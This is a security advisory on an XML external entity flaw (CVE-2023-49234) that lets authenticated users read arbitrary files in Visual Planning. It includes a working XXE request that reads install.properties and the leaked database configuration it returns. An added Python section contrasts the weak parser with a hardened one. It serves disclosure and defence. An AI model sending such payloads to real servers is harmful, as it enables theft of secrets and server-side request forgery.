Visual Planning 8 Arbitrary File Read

Posted Apr 5, 2024
Authored by David Brown, Lennert Preuth | Site schutzwerk.com

Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system. All versions prior to Visual Planning 8 (Build 240207) are affected.

tags | exploit, arbitrary, local
advisories | CVE-2023-49234
SHA-256 | bdf19a1c93a8a216cff1545664827634a9baef8a83c8ebb7ba571f139ed08b7a

Title
=====

SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in
Visual Planning

Status
======

PUBLISHED

Version
=======

1.0

CVE reference
=============

CVE-2023-49234

Link
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/

Text-only version:
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt

Affected products/vendor
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary
=======

Authenticated attackers can exploit a weakness in the XML parser
functionality of the Visual Planning[0] application in order to obtain
read access to arbitrary files on the application server. Depending on
configured access permissions, this vulnerability could be used by an
attacker to exfiltrate secrets stored on the local file system.

Risk
====

An attacker can use the vulnerability to gather information and,
depending on the stored data, exfiltrate secrets from the file system.
Furthermore, HTTP requests can be used for out-of-band exfiltration and
possibly server-side request forgery (SSRF) attacks.

Description
===========

During a recent red teaming assessment, Visual Planning was identified
as part of the customer's internet-facing assets. The software is
developed by STILOG I.S.T. and provides resource management and
scheduling features. A security assessment conducted by SCHUTZWERK found
an arbitrary file read vulnerability via XML external entities in Visual
Planning.

The application's Admin Center (vpadmin) communicates with the server
through an XML-based protocol that uses proprietary compression
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom
proxy as part of the assessment in order to intercept and manipulate the
messages exchanged between the application and the server.

One of the messages sent by the Admin Center application after
authentication is the following:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>

</defaultValue>
<propertyName>PWD</propertyName>
<rawResult>false</rawResult>
<section>INSTALLDATA</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The method GetApplicationProperty is called to request the value of the
property PWD. The server responds with an XML message, where the value
element contains the response of the query:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>

</value>
</com.visualplanning.query.result.ApplicationPropertyResult>

In this response it was observed that, if the requested property value
cannot be resolved, the content of the request's defaultValue element
is reflected in the response, making it a suitable back channel for
XML external entity (XXE) injection.

The following message was sent to the Visual Planning application:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM
"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>&example;</defaultValue>
<propertyName>ShowBackground</propertyName>
<rawResult>false</rawResult>
<section>Application</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>

The server responds with the content of the requested install.properties
file inside the value element, thus confirming the XML parser is
vulnerable to XML external entity (XXE) injections:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>#
#Tue Oct 03 15:37:33 CEST 2023
INSTALLDATA.INSTALLSERIAL=
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning
INSTALLDATA.OK=Next
INSTALLDATA.PAGE=PROVIDER
INSTALLDATA.POOLMODE=1
INSTALLDATA.PORT=3306
INSTALLDATA.PROVIDERTYPE=MySQL
INSTALLDATA.PWD=ENCODE\:
INSTALLDATA.SERVER=127.0.0.1
INSTALLDATA.SERVERLANG=de
INSTALLDATA.USER=root
INSTALLDATA.VIEWERSERIAL=
</value>
</com.visualplanning.query.result.ApplicationPropertyResult>

Further testing showed that out-of-band exfiltration via HTTPS requests
is also generally possible.
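As an added defender-side example (not part of the advisory or of the vendor's code), the following Python models the reflected defaultValue back channel with the standard library's SAX parser: the same advisory-shaped message is parsed once with external general entity loading switched on, which reproduces the file disclosure against a constructed temp file, and once with it off, next to a hardened wrapper that rejects any DOCTYPE before parsing. The element names come from the advisory; the file contents, temp path and function names are constructed.

```python
import os
import re
import tempfile
from io import StringIO
from xml import sax
from xml.sax.handler import feature_external_ges

SAMPLE_PROPERTIES = "INSTALLDATA.USER=root\nINSTALLDATA.PWD=ENCODE\\:\n"  # constructed stand-in for install.properties

class _DefaultValueCollector(sax.ContentHandler):
    """Collects the text of <defaultValue>, the element the server reflects back to the client."""
    def __init__(self):
        super().__init__()
        self.inside, self.parts = False, []
    def startElement(self, name, attrs):
        self.inside = self.inside or name == "defaultValue"
    def endElement(self, name):
        self.inside = self.inside and name != "defaultValue"
    def characters(self, content):
        if self.inside:
            self.parts.append(content)

def parse_default_value(xml_text, load_external_entities=False):
    """Return the defaultValue text; True models the weak parser setting, False the fix."""
    handler = _DefaultValueCollector()
    parser = sax.make_parser()
    parser.setFeature(feature_external_ges, load_external_entities)
    parser.setContentHandler(handler)
    parser.parse(StringIO(xml_text))
    return "".join(handler.parts)

def parse_default_value_hardened(xml_text):
    """Defence in depth: refuse any DOCTYPE up front, then parse with entity loading off."""
    if re.search(r"<!DOCTYPE", xml_text, re.IGNORECASE):  # legitimate messages carry no DOCTYPE
        raise ValueError("DOCTYPE is not allowed in GetApplicationProperty messages")
    return parse_default_value(xml_text, False)

def demo():
    """Parse an advisory-shaped message both ways; the SYSTEM entity points at a constructed temp file."""
    with tempfile.NamedTemporaryFile("w", suffix=".properties", delete=False) as fh:
        fh.write(SAMPLE_PROPERTIES)
    try:
        msg = (f'<!DOCTYPE foo [<!ENTITY example SYSTEM "{fh.name}">]>'
               '<com.visualplanning.query.parameters.GetApplicationProperty>'
               '<defaultValue>&example;</defaultValue><propertyName>ShowBackground</propertyName>'
               '</com.visualplanning.query.parameters.GetApplicationProperty>')
        return parse_default_value(msg, True), parse_default_value(msg, False)  # (weak, safe)
    finally:
        os.unlink(fh.name)
```

With the weak setting the returned defaultValue carries the temp file's contents, exactly the reflection the advisory observed; with loading off it is empty, and the hardened wrapper refuses the message before any parsing happens.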

Solution/Mitigation
===================

The vendor suggests updating to Visual Planning 8 (Build 240207).

Disclosure timeline
===================

2023-11-01: Vulnerability discovered
2023-11-09: Contact vendor in order to determine security contact
2023-11-10: Received generic sales response from vendor
2023-11-14: Contacted CTO of vendor directly
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor
2023-11-24: CVE assigned by Mitre
2023-11-24: Additional technical details provided to vendor
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings
is in progress
2024-01-30: Inquired about mitigation status regarding the reported
vulnerabilities
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were
already fixed
2024-03-08: Sent advisory drafts to vendor
2024-03-28: Received patch information and release of advisory

Contact/Credits
===============

The vulnerability was discovered during an assessment by Lennert Preuth
and David Brown of SCHUTZWERK GmbH.

References
==========

[0] https://www.visual-planning.com/en/

Disclaimer
==========

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
most recent version of this security advisory can be found at SCHUTZWERK
GmbH's website ( https://www.schutzwerk.com ).

Additional information
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/
